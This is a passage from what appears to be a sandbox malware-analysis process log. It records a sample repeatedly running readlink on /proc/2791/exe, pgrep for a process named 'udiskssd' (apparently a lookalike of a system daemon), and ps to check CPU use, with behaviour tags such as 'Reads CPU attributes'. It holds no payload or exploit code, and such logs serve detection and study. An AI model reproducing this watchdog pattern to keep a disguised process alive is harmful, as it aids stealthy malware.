- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3046
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3047
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3048
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3049
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3050
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3051
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3052
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:3053
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3054
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3055
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3056
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3057
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3058
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3059
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3060
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3061
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3062
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3063
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3064
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3065
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3066
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3067
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3068
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3069
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3070
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3071
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3072
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3073
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3074
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3075
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3076
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:3077
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3078
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3079
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3080
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3081
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3082
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3083
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:3084
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3086
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3087
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3088
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3089
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3090
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3091
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:3092
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3093
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3094
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3095
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:3096
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3097
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:3098
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3099
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:3100
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3101
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3102
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3103
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3104
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3105
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3106
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3107
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3108
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3109
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:3110
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3111
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3112
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3113
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:3114
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3115
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:3116
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3117
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3118
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3119
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:3120
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3121
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3122
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3123
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3124
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:3125
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3152
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3153
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3154
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:3155
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3157
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3158
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3159
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:3160
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3335
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3336
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3337
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:3338
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3349
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3350
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:3351
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3352
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3364
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3365
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:3366
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3367
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3458
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3469
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3471
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3472
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3694
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3695
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3698
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:3700
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3703
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3704
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3705
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3707
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:3709
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3710
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3711
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3712
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3714
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3715
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:3716
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3717
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3718
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3719
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3720
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3721
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3723
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3724
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3725
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3726
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3730
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:3731
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:3732
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:3734
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4613
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4626
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4627
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:4628
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4643
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4644
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4645
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:4646
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4712
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4726
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4727
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:4729
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4952
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4955
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4956
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:4959
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4961
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4962
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4963
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:4965
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4967
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4968
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4969
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:4970
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4972
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4973
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4974
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:4975
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4977
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4978
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:4979
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:4980
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:4985
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:4991
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:4993
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:5118
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5886
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5888
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:5889
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:5904
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5912
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5914
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:5915
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:5916
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5917
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5918
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:5919
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:5920
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5922
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5923
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:5924
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:5925
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5927
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5928
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:5929
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:5930
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5938
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5940
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:5941
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:5942
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5944
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5945
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:5946
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:5947
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:5949
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:5950
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:5951
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:5952
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:6118
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6124
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6125
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6126
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6129
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6130
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6131
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6132
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6136
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6137
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6138
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6139
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6143
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6144
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:6145
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6146
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6147
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6148
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6149
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:6150
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6151
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6152
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6153
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6154
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6155
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6156
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6157
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:6158
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6159
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6160
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6161
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:6162
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6163
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6164
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6165
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6166
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6167
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6168
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6169
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6170
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6171
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6172
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6173
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6174
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6175
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6176
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6177
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6178
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6179
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6180
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6181
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6182
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:6183
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6184
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6185
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6186
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6187
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6188
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6189
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6190
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6191
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6192
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6193
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6194
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6203
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6204
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6205
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6206
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:6207
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6208
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6209
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6210
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6211
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6212
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6213
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6214
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6215
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6216
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6217
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:6218
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6219
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6220
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6221
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6222
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6223
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6224
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6225
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6226
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6227
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6228
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6229
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6230
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6231
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6232
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6233
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6234
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6236
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6237
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6238
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6239
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6240
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6241
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:6242
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6243
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6244
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6245
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6246
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6247
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6253
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6254
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:6255
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6256
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6257
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6258
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:6259
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6260
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6261
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6262
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6263
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6264
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6265
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6266
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6267
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6268
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6269
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6270
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:6271
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6272
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6273
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6274
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6275
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6276
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6277
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6278
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6279
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6280
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6281
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6282
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6283
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6284
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6285
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6286
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6287
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6288
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6289
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6290
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6291
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6292
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6293
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6294
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6295
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6296
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6297
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6298
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:6299
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6300
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6301
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6302
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6303
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:6304
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6305
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6306
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6307
